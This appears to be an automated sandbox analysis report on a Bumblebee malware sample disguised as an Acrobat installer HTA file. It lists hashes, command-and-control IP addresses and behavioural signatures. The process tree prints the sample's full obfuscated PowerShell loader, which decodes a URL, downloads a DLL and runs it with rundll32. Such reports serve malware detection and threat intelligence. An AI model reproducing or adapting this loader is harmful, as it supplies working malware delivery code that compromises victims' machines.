Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
09-12-2022 06:58
Static task
static1
Behavioral task
behavioral1
Sample
AcrobatInstaller.hta
Resource
win7-20220812-en
General
-
Target
AcrobatInstaller.hta
-
Size
96KB
-
MD5
24432d480bb9d709ab25209a630cb203
-
SHA1
42a30be9fb069c43ef06fb9acb47909d9dab8cef
-
SHA256
18810249d8c67ac8926613e773e1c5e40449be55c595116dce99bb35004de374
-
SHA512
be12606eec050d7c9073c9e36ddbb18b3d69a12dc5823a601b089729640abeeb5e6a7a2ac07131198c468ae96366ef95274409573ebf771a97678d30e049a04a
-
SSDEEP
1536:v9Q2Ca7Qr8FYoV+iUpQCe9WRhIHt/7YZ1f:v9QTa7Qr8FYc+iUkgYJUnf
Malware Config
Extracted
bumblebee
1011t1
64.44.135.140:443
103.144.139.150:443
146.70.149.43:443
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 18 3068 powershell.exe 37 988 rundll32.exe 58 988 rundll32.exe 69 988 rundll32.exe 75 988 rundll32.exe 83 988 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 2 IoCs
pid Process 1992 rundll32.exe 988 rundll32.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 988 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3068 powershell.exe 3068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3068 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1496 wrote to memory of 3068 1496 mshta.exe 79 PID 1496 wrote to memory of 3068 1496 mshta.exe 79 PID 1496 wrote to memory of 3068 1496 mshta.exe 79 PID 3068 wrote to memory of 1992 3068 powershell.exe 83 PID 3068 wrote to memory of 1992 3068 powershell.exe 83 PID 3068 wrote to memory of 1992 3068 powershell.exe 83 PID 1992 wrote to memory of 988 1992 rundll32.exe 84 PID 1992 wrote to memory of 988 1992 rundll32.exe 84
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\AcrobatInstaller.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MWG($Fii, $erX){[IO.File]::WriteAllBytes($Fii, $erX)};function LaM($Fii){if($Fii.EndsWith((HQD @(6236,6290,6298,6298))) -eq $True){rundll32.exe $Fii , mruAlloc }elseif($Fii.EndsWith((HQD @(6236,6302,6305,6239))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Fii}elseif($Fii.EndsWith((HQD @(6236,6299,6305,6295))) -eq $True){misexec /qn /i $Fii}else{Start-Process $Fii}};function NRU($eMW){$QMX = New-Object (HQD @(6268,6291,6306,6236,6277,6291,6288,6257,6298,6295,6291,6300,6306));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$erX = $QMX.DownloadData($eMW);return $erX};function HQD($vfw){$ZTq=6190;$ViK=$Null;foreach($aFd in $vfw){$ViK+=[char]($aFd-$ZTq)};return $ViK};function Xxb(){$Bpm = $env:AppData + '\';;;$WbktydWSz = $Bpm + '1011t1_cr1.dll'; if (Test-Path -Path $WbktydWSz){LaM $WbktydWSz;}Else{ $jPzXrDoPH = NRU (HQD @(6294,6306,6306,6302,6305,6248,6237,6237,6289,6304,6307,6290,6305,6235,6289,6298,6307,6288,6236,6289,6301,6299,6237,6239,6238,6239,6239,6306,6239,6285,6289,6304,6239,6236,6290,6298,6298));MWG $WbktydWSz $jPzXrDoPH;LaM $WbktydWSz;};;}Xxb;2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:988
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
830KB
MD519f8c4fb6b729f856173beba2b8cfc1d
SHA137faae961fa1ca194a2d29a5ac4958e91f0c4c9c
SHA256ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9
SHA5124e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308
-
Filesize
830KB
MD519f8c4fb6b729f856173beba2b8cfc1d
SHA137faae961fa1ca194a2d29a5ac4958e91f0c4c9c
SHA256ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9
SHA5124e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308
-
Filesize
830KB
MD519f8c4fb6b729f856173beba2b8cfc1d
SHA137faae961fa1ca194a2d29a5ac4958e91f0c4c9c
SHA256ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9
SHA5124e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308